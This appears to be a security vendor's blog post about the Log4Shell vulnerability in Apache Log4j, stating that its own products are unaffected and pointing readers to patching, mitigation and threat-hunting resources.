Just as people were starting to turn their attention to the upcoming holidays, the cybersecurity world received an unwelcome end-of-year surprise over the weekend: the critical RCE vulnerability CVE-2021-44228—now being referred to as Log4Shell. The vulnerability affects Apache Log4j, a very widely used, Java-based logging tool.
Log4Shell has been given the highest possible severity rating of 10. It holds the possibility to create problems on an unimaginable scale because of the millions of applications and manufacturers that use Log4j, as well as the simplicity of the exploits. Attackers can trigger a series of events resulting in remote code execution with a simple line of text. One widely shared example by a researcher at Huntress showed how the chat function in the video game Minecraft could be used to detonate a payload on computers that were connected to the server.
The vulnerability can be easily used to take control of a system for malicious purposes. It remains to be seen what types of attacks will become the primary method, as opportunistic hackers have so far been scattershot in their early attacks.
Before we go any further, we should make it clear that no D3 software uses Apache Log4j, so our products are not affected by Log4Shell. Our clients can continue to use D3 SOAR safely.
However, because of the ubiquitous nature of Log4j in SaaS tools, many people are wondering what they can safely turn on. This is because companies don’t always know exactly what assets they have that use a particular tool like Log4j.
For companies who don’t know which of their systems are vulnerable, a list of products affected by Log4Shell can be found here.
Huntress has also created a Log4Shell Vulnerability Tester that can be used to identify vulnerable applications.
Companies should apply the latest updates to any affected systems. Organizations that use Log4j must immediately update it to Log4j 2.15.0, as all previous versions of Log4j 2 are vulnerable. Forrester’s Allie Mellen recommends creating a patching strategy to ensure that the most high-risk systems are updated first. For systems that cannot be patched right away, our partners at Cybereason have made a “vaccine” freely available that can disable the vulnerability.
Microsoft has also published a series of workarounds that can help mitigate risk.
Forrester also recommends updating your web application firewall rules to block exploit attempts, with the understanding that this will be an iterative process because no set of rules is going to perfectly address every potential attack. Because cryptomining has been found to be a common goal of early Log4Shell attackers, companies can also conduct threat hunting focused on evidence of cryptojacking to proactively find signs of compromise.
If the exploit is used to enact malicious activity such as cryptojacking or deployment of malware, D3 NextGen SOAR can help manage those alerts via our codeless playbooks and extensive integrations.
The situation is developing quickly, with cybersecurity experts around the world sharing resources and knowledge to help organizations and individuals mitigate risk. Keep an eye on the sources we’ve shared, as well as security communities on Reddit and Twitter to stay apprised of the latest developments.